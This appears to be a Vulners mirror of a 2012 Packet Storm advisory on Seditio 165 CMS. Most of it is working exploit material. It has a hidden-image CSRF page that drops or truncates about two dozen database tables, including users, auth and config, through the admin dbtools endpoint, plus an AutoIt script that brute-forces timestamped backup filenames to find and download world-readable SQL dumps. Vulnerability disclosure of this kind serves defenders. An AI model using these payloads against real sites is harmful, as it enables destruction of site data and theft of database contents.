Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Seditio 165 Cross Site Request Forgery / Backup Disclosure

🗓️ 09 Apr 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Seditio 165 Cross Site Request Forgery / Backup Disclosure vulnerability in Kaan's versio

Code
`=============================================  
Vulnerable Software: Seditio v165  
Downloaded from: http://seditio-eklenti.com/datas/users/1-seditio.165.rar   
(This version is under development of Kaan)  
  
$ md5sum 1-seditio.165.rar  
2eebc8d80f7fcd4e9a0d0659ef193488 *1-seditio.165.rar  
=============================================  
Vuln Desc:  
Seditio 165 is prone to CROSS SITE REQUEST FORGERY vuln.  
*Because in administration section it uses   
T3 DB Tools v1.6 without any $_GET tokenization this is possible without any problem to exploitate CSRF against application and destroy/truncate  
database tables*  
*Second issuse is seditio 165 stores database dump files in unsafe manner(See below)*  
==============================================  
Tested:  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
=================================================  
  
  
@Print screen after succesfully CSRF attack:  
http://s019.radikal.ru/i601/1204/1b/90552af729ad.png  
  
  
====================== Seditio 165 Drop/truncate Database tables using CSRF vuln ===================================  
<h1>Seditio 165 Drop Database tables using CSRF vuln<br>  
Because usage of T3 DB Tools v1.6 without any $_GET tokenization in administration section.</h1>  
  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165/t/admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0"></img>  
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0"></img>  
<!--IDEA! CTRL+H http://192.168.0.15/learn/128/sed/seditio165/ to target :D-->  
====================== EOF Seditio 165 Drop Database tables using CSRF vuln ===================================  
  
You can change &a=drop to truncate statement too  
In ex:  
<img src="http://CHANGE_TO_RTARGEt/admin.php?m=dbtools&a=truncate&table=sed_forum_posts" width="0" height="0"></img>  
  
Another issuse is: # Theris No .htaccess file to protect database dump files from world (Hint .htaccess =>deny from all<=)  
  
[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups  
# ls -lia  
total 93  
562949953537506 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:08 .  
1407374883669468 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:02 ..  
562949953537507 -rwxrwxrwx+ 1 mehere ???????? 370 Feb 12 21:39 index.php  
1970324837100442 -rwx------+ 1 ???????? ???????? 91031 Apr 7 03:08 sed165_04.07.12-030823.sql <=== this is my dump  
  
  
[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups  
# pwd  
/cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups  
  
[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups  
#  
  
  
Since database dump potentially world readable this is possible to bruteforce for existing database dump(s) and steal it.  
From scratch and a bit lame but works for me at least it is Proof of concept:  
@Print screen bruteforce result:   
http://s019.radikal.ru/i614/1204/af/a16616428e18.png  
  
  
==================== Bruteforcer to find existing database dump file for seditio 165 ==========================  
#include <inet.au3>  
  
  
$prefix='sed165_'; db prefix in most cases sed_  
  
$il='2012'; start year  
$ay='04' ; start month  
$gun='07'; start day  
$site='http://192.168.0.15/learn/128/sed/seditio165/datas/backups/'; //target site  
  
  
#cs  
DO not touch  
#ce  
  
  
$saniye=00;  
$deqiqe=00;  
$saat=03;  
;~ $gun='01'  
  
$il=StringMid($il,3,StringLen($il))  
  
while 1  
  
Sleep(10);  
$saniye+=1;  
if $saniye >59 Then  
$saniye='00'  
$deqiqe+=1;  
EndIf  
  
if $deqiqe <10 Then  
$deqiqe='0' & StringMid($deqiqe,StringLen($deqiqe),1)  
EndIf  
  
if $deqiqe >59 Then  
$deqiqe='00';  
$saat+=1;  
EndIf  
  
if $saat <10 Then  
$saat='0' & StringMid($saat,StringLen($saat),1)  
EndIf  
  
if $saat >23 Then  
$saat='00'  
$gun+=1;  
EndIf  
  
if $gun <10 Then  
$gun='0' & StringMid($gun,StringLen($gun),1)  
EndIf  
  
if $gun >31 Then  
$gun='01';  
$ay+=1;  
EndIf  
  
if $ay <10 Then  
$ay='0' & StringMid($ay,StringLen($ay),1)  
EndIf  
  
if $ay >12 Then  
$ay='01';  
$il+=1;  
EndIf  
  
  
if $saniye <10 Then  
$saniye='0' & StringMid($saniye,1,1);  
EndIf  
  
;~ format of dumpfile sed165_04.07.12-030823.sql  
$fetchitifexists=$prefix & $ay & '.' & $gun & '.' & $il & '-' & $saat & $deqiqe & $saniye &'.sql' & @CRLF  
ConsoleWrite('Verifying ' & $fetchitifexists & @CRLF);  
  
if StringInStr(_INetGetSource($site & $fetchitifexists,TRUE),'-- T3 DB Tools',0) Then  
MsgBox(0,"Check it out",$site & $fetchitifexists,10)  
  
FileWrite(@ScriptDir &"\wohoooo.txt",$site & $fetchitifexists & @CRLF)  
$confirm=MsgBox(65,"Exit or continue?","Exit or Continue?")  
if $confirm=1 Then  
MsgBox(48,"Bye","Byeeee xD");  
Exit  
EndIf  
EndIf  
  
  
WEnd  
  
  
========================== EOF bruteforcer ============================================================  
  
  
  
  
/AkaStep ^_^  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Apr 2012 00:00Current
7.4High risk
Vulners AI Score7.4
seditio 165cross site request forgerybackup disclosurekaant3 db tools v1.6database dump filesvulnerability
23